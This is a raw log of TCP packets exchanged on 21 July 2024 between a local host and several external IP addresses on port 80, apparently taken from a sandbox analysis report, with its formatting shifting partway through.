Jul 21, 2024 13:31:36.025886059 CEST | 49708 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:36.031075001 CEST | 80 | 49708 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:36.031085014 CEST | 80 | 49708 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:36.504559040 CEST | 80 | 49708 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:36.504637957 CEST | 49708 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:37.535896063 CEST | 49708 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:37.540946007 CEST | 80 | 49708 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:38.555609941 CEST | 49709 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:39.324007988 CEST | 80 | 49709 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:39.324139118 CEST | 49709 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:39.326219082 CEST | 49709 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:39.331191063 CEST | 80 | 49709 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:39.801973104 CEST | 80 | 49709 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:39.802023888 CEST | 80 | 49709 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:39.802184105 CEST | 49709 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:39.804696083 CEST | 49709 | 80 | 192.168.2.7 | 76.223.67.189
Jul 21, 2024 13:31:39.809655905 CEST | 80 | 49709 | 76.223.67.189 | 192.168.2.7
Jul 21, 2024 13:31:44.841401100 CEST | 49710 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:44.846329927 CEST | 80 | 49710 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:44.846453905 CEST | 49710 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:44.848642111 CEST | 49710 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:44.853617907 CEST | 80 | 49710 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:45.332978010 CEST | 80 | 49710 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:45.333100080 CEST | 49710 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:46.364126921 CEST | 49710 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:46.369267941 CEST | 80 | 49710 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:47.382407904 CEST | 49711 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:47.387451887 CEST | 80 | 49711 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:47.387572050 CEST | 49711 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:47.389334917 CEST | 49711 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:47.394355059 CEST | 80 | 49711 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:47.845068932 CEST | 80 | 49711 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:47.845190048 CEST | 49711 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:48.895476103 CEST | 49711 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:48.900501013 CEST | 80 | 49711 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:49.914279938 CEST | 49712 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:50.184567928 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:50.184727907 CEST | 49712 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:50.187031031 CEST | 49712 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:50.192106962 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:50.192271948 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:50.676467896 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:50.676739931 CEST | 49712 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:51.692318916 CEST | 49712 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:51.874970913 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:52.710349083 CEST | 49713 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:52.715466022 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:52.715666056 CEST | 49713 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:52.717626095 CEST | 49713 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:52.722580910 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:53.199148893 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:53.199189901 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:53.199532032 CEST | 49713 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:53.202315092 CEST | 49713 | 80 | 192.168.2.7 | 3.33.130.190
Jul 21, 2024 13:31:53.207242966 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.7
Jul 21, 2024 13:31:58.270678997 CEST | 49714 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:31:58.277187109 CEST | 80 | 49714 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:31:58.277360916 CEST | 49714 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:31:58.279372931 CEST | 49714 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:31:58.284353018 CEST | 80 | 49714 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:31:58.865998030 CEST | 80 | 49714 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:31:58.866065025 CEST | 80 | 49714 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:31:58.866136074 CEST | 49714 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:31:58.866976023 CEST | 80 | 49714 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:31:58.867042065 CEST | 49714 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:31:59.785866022 CEST | 49714 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:00.916435957 CEST | 49715 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:00.921459913 CEST | 80 | 49715 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:00.925389051 CEST | 49715 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:00.990570068 CEST | 49715 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:00.995476961 CEST | 80 | 49715 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:01.508244991 CEST | 80 | 49715 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:01.508265972 CEST | 80 | 49715 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:01.508363008 CEST | 49715 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:01.508661985 CEST | 80 | 49715 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:01.508711100 CEST | 49715 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:02.520282030 CEST | 49715 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:03.833182096 CEST | 49716 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:03.891288042 CEST | 80 | 49716 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:03.891513109 CEST | 49716 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:03.893337011 CEST | 49716 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:03.898231983 CEST | 80 | 49716 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:03.898552895 CEST | 80 | 49716 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:04.501538038 CEST | 80 | 49716 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:04.501636982 CEST | 80 | 49716 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:04.501735926 CEST | 49716 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:04.501883984 CEST | 80 | 49716 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:04.504580975 CEST | 49716 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:05.395334959 CEST | 49716 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:06.413572073 CEST | 49717 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:06.418679953 CEST | 80 | 49717 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:06.418785095 CEST | 49717 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:06.420315027 CEST | 49717 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:06.425324917 CEST | 80 | 49717 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:06.994693995 CEST | 80 | 49717 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:06.994718075 CEST | 80 | 49717 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:06.994730949 CEST | 80 | 49717 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:06.994853973 CEST | 49717 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:06.995136023 CEST | 80 | 49717 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:06.995187044 CEST | 49717 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:07.115598917 CEST | 49717 | 80 | 192.168.2.7 | 188.114.97.3
Jul 21, 2024 13:32:07.120883942 CEST | 80 | 49717 | 188.114.97.3 | 192.168.2.7
Jul 21, 2024 13:32:12.325649023 CEST | 49718 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:12.330571890 CEST | 80 | 49718 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:12.330698013 CEST | 49718 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:12.332983017 CEST | 49718 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:12.338313103 CEST | 80 | 49718 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:13.847666025 CEST | 80 | 49718 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:13.847695112 CEST | 80 | 49718 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:13.847765923 CEST | 49718 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:13.849029064 CEST | 49718 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:14.867351055 CEST | 49719 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:15.049582958 CEST | 80 | 49719 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:15.049813032 CEST | 49719 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:15.051909924 CEST | 49719 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:15.056971073 CEST | 80 | 49719 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:15.734257936 CEST | 80 | 49719 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:15.734364986 CEST | 80 | 49719 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:15.734570026 CEST | 49719 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:16.576523066 CEST | 49719 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:17.602922916 CEST | 49720 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:17.607948065 CEST | 80 | 49720 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:17.608669996 CEST | 49720 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:17.611635923 CEST | 49720 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:17.616719007 CEST | 80 | 49720 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:17.616730928 CEST | 80 | 49720 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:18.070393085 CEST | 80 | 49720 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:18.071032047 CEST | 80 | 49720 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:18.071099043 CEST | 49720 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:19.114423990 CEST | 49720 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:20.133308887 CEST | 49721 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:20.138500929 CEST | 80 | 49721 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:20.138612032 CEST | 49721 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:20.140944958 CEST | 49721 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:20.146056890 CEST | 80 | 49721 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:21.613616943 CEST | 80 | 49721 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:21.613657951 CEST | 80 | 49721 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:21.613905907 CEST | 49721 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:21.616673946 CEST | 49721 | 80 | 192.168.2.7 | 103.168.172.37
Jul 21, 2024 13:32:21.622596025 CEST | 80 | 49721 | 103.168.172.37 | 192.168.2.7
Jul 21, 2024 13:32:31.839251041 CEST | 49722 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:31.844358921 CEST | 80 | 49722 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:31.844449997 CEST | 49722 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:31.846313953 CEST | 49722 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:31.851691008 CEST | 80 | 49722 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:32.308267117 CEST | 80 | 49722 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:32.308649063 CEST | 80 | 49722 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:32.308701992 CEST | 49722 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:33.350327015 CEST | 49722 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:34.368228912 CEST | 49723 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:34.413605928 CEST | 80 | 49723 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:34.413707018 CEST | 49723 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:34.415971041 CEST | 49723 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:34.420847893 CEST | 80 | 49723 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:34.870908976 CEST | 80 | 49723 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:34.870930910 CEST | 80 | 49723 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:34.871006966 CEST | 49723 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:35.926651955 CEST | 49723 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:36.945458889 CEST | 49724 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:36.950392962 CEST | 80 | 49724 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:36.950591087 CEST | 49724 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:36.952569962 CEST | 49724 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:36.957484961 CEST | 80 | 49724 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:36.957560062 CEST | 80 | 49724 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:37.409792900 CEST | 80 | 49724 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:37.409832001 CEST | 80 | 49724 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:37.409918070 CEST | 49724 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:38.457988977 CEST | 49724 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:39.477821112 CEST | 49725 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:39.482975960 CEST | 80 | 49725 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:39.483086109 CEST | 49725 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:39.485057116 CEST | 49725 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:39.490034103 CEST | 80 | 49725 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:39.957283020 CEST | 80 | 49725 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:39.957314014 CEST | 80 | 49725 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:39.957552910 CEST | 49725 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:39.962198019 CEST | 49725 | 80 | 192.168.2.7 | 188.114.96.3
Jul 21, 2024 13:32:39.967813969 CEST | 80 | 49725 | 188.114.96.3 | 192.168.2.7
Jul 21, 2024 13:32:45.300031900 CEST | 49726 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:45.306682110 CEST | 80 | 49726 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:45.306858063 CEST | 49726 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:45.309068918 CEST | 49726 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:45.314022064 CEST | 80 | 49726 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:45.917604923 CEST | 80 | 49726 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:45.917733908 CEST | 80 | 49726 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:45.917813063 CEST | 49726 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:46.818283081 CEST | 49726 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:47.836342096 CEST | 49727 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:47.841567039 CEST | 80 | 49727 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:47.844321012 CEST | 49727 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:47.846599102 CEST | 49727 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:47.851497889 CEST | 80 | 49727 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:48.445993900 CEST | 80 | 49727 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:48.446018934 CEST | 80 | 49727 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:48.446104050 CEST | 49727 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:49.349642038 CEST | 49727 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:50.368477106 CEST | 49728 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:50.373651981 CEST | 80 | 49728 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:50.373739958 CEST | 49728 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:50.375916958 CEST | 49728 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:50.385127068 CEST | 80 | 49728 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:50.385149002 CEST | 80 | 49728 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:51.011807919 CEST | 80 | 49728 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:51.011846066 CEST | 80 | 49728 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:51.012598038 CEST | 49728 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:51.880141020 CEST | 49728 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:52.899883986 CEST | 49729 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:52.904885054 CEST | 80 | 49729 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:52.904983044 CEST | 49729 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:52.907337904 CEST | 49729 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:52.912157059 CEST | 80 | 49729 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:53.501008034 CEST | 80 | 49729 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:53.501038074 CEST | 80 | 49729 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:53.501282930 CEST | 49729 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:53.505634069 CEST | 49729 | 80 | 192.168.2.7 | 203.161.41.207
Jul 21, 2024 13:32:53.510514021 CEST | 80 | 49729 | 203.161.41.207 | 192.168.2.7
Jul 21, 2024 13:32:58.604017019 CEST | 49730 | 80 | 192.168.2.7 | 84.32.84.32
Jul 21, 2024 13:32:58.610951900 CEST | 80 | 49730 | 84.32.84.32 | 192.168.2.7
Jul 21, 2024 13:32:58.611037016 CEST | 49730 | 80 | 192.168.2.7 | 84.32.84.32
Jul 21, 2024 13:32:58.613533020 CEST | 49730 | 80 | 192.168.2.7 | 84.32.84.32
Jul 21, 2024 13:32:58.620208025 CEST | 80 | 49730 | 84.32.84.32 | 192.168.2.7
Jul 21, 2024 13:32:59.089325905 CEST | 80 | 49730 | 84.32.84.32 | 192.168.2.7
Jul 21, 2024 13:32:59.089783907 CEST | 49730 | 80 | 192.168.2.7 | 84.32.84.32
Jul 21, 2024 13:33:00.129899979 CEST | 49730 | 80 | 192.168.2.7 | 84.32.84.32
Jul 21, 2024 13:33:00.135072947 CEST | 80 | 49730 | 84.32.84.32 | 192.168.2.7
Jul 21, 2024 13:33:01.148371935 CEST | 49731 | 80 | 192.168.2.7 | 84.32.84.32
Jul 21, 2024 13:33:01.153331995 CEST | 80 | 49731 | 84.32.84.32 | 192.168.2.7
Jul 21, 2024 13:33:01.153740883 CEST | 49731 | 80 | 192.168.2.7 | 84.32.84.32
Jul 21, 2024 13:33:01.157653093 CEST | 49731 | 80 | 192.168.2.7 | 84.32.84.32
Jul 21, 2024 13:33:01.162656069 CEST | 80 | 49731 | 84.32.84.32 | 192.168.2.7
Jul 21, 2024 13:33:01.620652914 CEST | 80 | 49731 | 84.32.84.32 | 192.168.2.7
Jul 21, 2024 13:33:01.623905897 CEST | 49731 | 80 | 192.168.2.7 | 84.32.84.32
Jul 21, 2024 13:33:02.670425892 CEST | 49731 | 80 | 192.168.2.7 | 84.32.84.32
Jul 21, 2024 13:33:02.675415993 CEST | 80 | 49731 | 84.32.84.32 | 192.168.2.7
Jul 21, 2024 13:33:03.680569887 CEST | 49732 | 80 | 192.168.2.7 | 84.32.84.32
                                              Jul 21, 2024 13:33:03.685748100 CEST804973284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:03.687371016 CEST4973280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:03.689584970 CEST4973280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:03.694807053 CEST804973284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:03.694818974 CEST804973284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:04.174477100 CEST804973284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:04.174568892 CEST4973280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:05.192507982 CEST4973280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:05.197483063 CEST804973284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.212553978 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.217700958 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.217787981 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.219988108 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.225527048 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.685714960 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.685775995 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.685813904 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.685838938 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.685847998 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.685884953 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.685899973 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.685940027 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.686018944 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.686073065 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.686110020 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.686155081 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.686162949 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.686197996 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.686248064 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.690665007 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.695693970 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:11.736215115 CEST4973480192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:11.741380930 CEST804973413.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:11.741466999 CEST4973480192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:11.743964911 CEST4973480192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:11.748837948 CEST804973413.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:12.221828938 CEST804973413.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:12.221898079 CEST4973480192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:13.270700932 CEST4973480192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:13.275759935 CEST804973413.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:14.291534901 CEST4973580192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:14.299966097 CEST804973513.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:14.300044060 CEST4973580192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:14.303020000 CEST4973580192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:14.310777903 CEST804973513.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:14.769989014 CEST804973513.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:14.770047903 CEST4973580192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:15.819684029 CEST4973580192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:15.824841976 CEST804973513.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:16.844818115 CEST4973680192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:16.849872112 CEST804973613.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:16.849946976 CEST4973680192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:16.852766991 CEST4973680192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:16.857779980 CEST804973613.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:16.857799053 CEST804973613.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:17.329452038 CEST804973613.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:17.331774950 CEST4973680192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:18.364317894 CEST4973680192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:18.370558977 CEST804973613.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:19.385665894 CEST4973780192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:19.390887022 CEST804973713.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:19.393811941 CEST4973780192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:19.395808935 CEST4973780192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:19.402050018 CEST804973713.248.169.48192.168.2.7
